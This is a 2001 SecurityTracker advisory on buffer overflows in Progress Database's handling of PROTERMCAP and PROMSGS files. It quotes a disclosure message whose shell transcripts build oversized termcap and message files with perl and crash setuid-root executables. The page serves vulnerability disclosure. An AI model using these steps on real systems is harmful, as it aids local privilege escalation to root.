SecurityTracker.com
Category:   Application (Database)  >   Progress Database
Vendors:   Progress Software Corporation
Progress Database PROTERMCAP and PROMSGS Errors Let Local Users Execute Arbitrary Code with Root Level Privileges
SecurityTracker Alert ID:  1002534
SecurityTracker URL:  http://securitytracker.com/id/1002534
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Oct 11 2001
Impact:   Execution of arbitrary code via local system, Root access via local system, User access via local system
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 8.x and 9.x
Description:   A vulnerability was reported in Progress Database in its handling of the PROTERMCAP and PROMSGS files. A local user could trigger a buffer overflow in a set user id (suid) root process and gain root level access on the host.

It is reported that a malformed PROTERMCAP or PROMSGS file can cause a memory overwrite to occur. A local user can apparently put a few thousand characters on each line of the file to crash various set user id (suid) root executables.

An example malformed line and a demonstration exploit transcript are provided in the Source Message.

Impact:   A local user can execute arbitrary code with root level privileges.
Solution:   The vendor has reportedly released patches, but no information was provided on the patches. Contact the vendor for more information.
Vendor URL:  www.progress.com/v9/datasheets/rdbms.htm
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (DGUX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   None.


 Source Message Contents

Subject:  Progress TERM (protermcap) overflows and PROMSGS overflows


A malformed termcaps and promsgs can overwrite memory on progress
versions 8 and 9. These are two separate issues but the below examples
show they can be used simultaneously in some cases. These have been
patched to my knowledge however I do not know the patch numbers. Put a
few thousand chars on each line and you should be able to crash most of
the suid executables and plenty of others. Please note these issues are
not related to the other 2 posts released this week. They were filed
with progress under different issue tickets and were addressed in fixes
separately.

mal termcap entry:
v7kf|version 7 key functions:\

:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....    	
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....       
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....


[root@linux dlc]# echo "v7kf|version 7 key functions:\\" > term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# export PROTERMCAP=./term  

There are a few ways to set this off... you can make use of a bug in the
PROMSGS. Here is the standard promsgs error for a bad term.
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
 
Unable to use your terminal. Check your PROTERMCAP file. (443)
** Could not find terminal type xterm in file ./term. (146)

[root@linux dlc]# perl -e 'print "A" x 9000' > /tmp/promsgs
[root@linux dlc]# export PROMSGS=/tmp/promsgs

[root@linux dlc]# bin/pro

        @@@@@@   @@@@@@   @@@@@@@   @@@@@   @@@@@@   @@@@@@@   @@@@@   
@@@@@
       @     @  @     @  @     @  @     @  @     @  @        @     @ 
@     @
      @     @  @     @  @     @  @        @     @  @        @        @
     @@@@@@   @@@@@@   @     @  @  @@@@  @@@@@@   @@@@@     @@@@@   
@@@@@
    @        @   @    @     @  @     @  @   @    @              @       
@
   @        @    @   @     @  @     @  @    @   @        @     @  @    
@
  @        @     @  @@@@@@@   @@@@@   @     @  @@@@@@@   @@@@@    @@@@@

                           Progress Software Corporation
                                    14 Oak Park
                            Bedford, Massachusetts 01730
                                    781-280-4000

       PROGRESS is a registered trademark of Progress Software
Corporation
                              Copyright 1984-2001
                        by Progress Software Corporation
                              All Rights Reserved

PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001

Error formatting messaage 96.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
rrno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
Error formatting messaage 146.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 443
Error formatting messaage 49.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 439
Quit (core dumped)

Here's the normal error when the termcap is wrong.
Unable to use your terminal. Check your PROTERMCAP file. (443)
** The protermcap file must contain :ce. (117)
** The protermcap file must contain :cl. (117)
** The protermcap file must contain :cm. (117)


Now for an example using just the termcap without tampering with
PROMSGS...
[root@linux dlc]# echo :ce=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :cl=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :cm=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :ce=`perl -e 'print "A" x 9000'` >> term  
[root@linux dlc]# export TERM=v7kf
[root@linux dlc]# bin/pro

 
        @@@@@@   @@@@@@   @@@@@@@   @@@@@   @@@@@@   @@@@@@@   @@@@@   
@@@@@
       @     @  @     @  @     @  @     @  @     @  @        @     @ 
@     @
      @     @  @     @  @     @  @        @     @  @        @        @
     @@@@@@   @@@@@@   @     @  @  @@@@  @@@@@@   @@@@@     @@@@@   
@@@@@
    @        @   @    @     @  @     @  @   @    @              @       
@
   @        @    @   @     @  @     @  @    @   @        @     @  @    
@
  @        @     @  @@@@@@@   @@@@@   @     @  @@@@@@@   @@@@@    @@@@@
 
                           Progress Software Corporation
                                    14 Oak Park
                            Bedford, Massachusetts 01730
                                    781-280-4000
 
       PROGRESS is a registered trademark of Progress Software
Corporation
                              Copyright 1984-2001
                        by Progress Software Corporation
                              All Rights Reserved
 
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
 
SYSTEM ERROR: strent request for more than 32K. (893)
Quit (core dumped)


It is also possible to crash suids using only the PROMSGS... I have a
patched version at the moment so I can not demonstrate. 

-KF

 
 

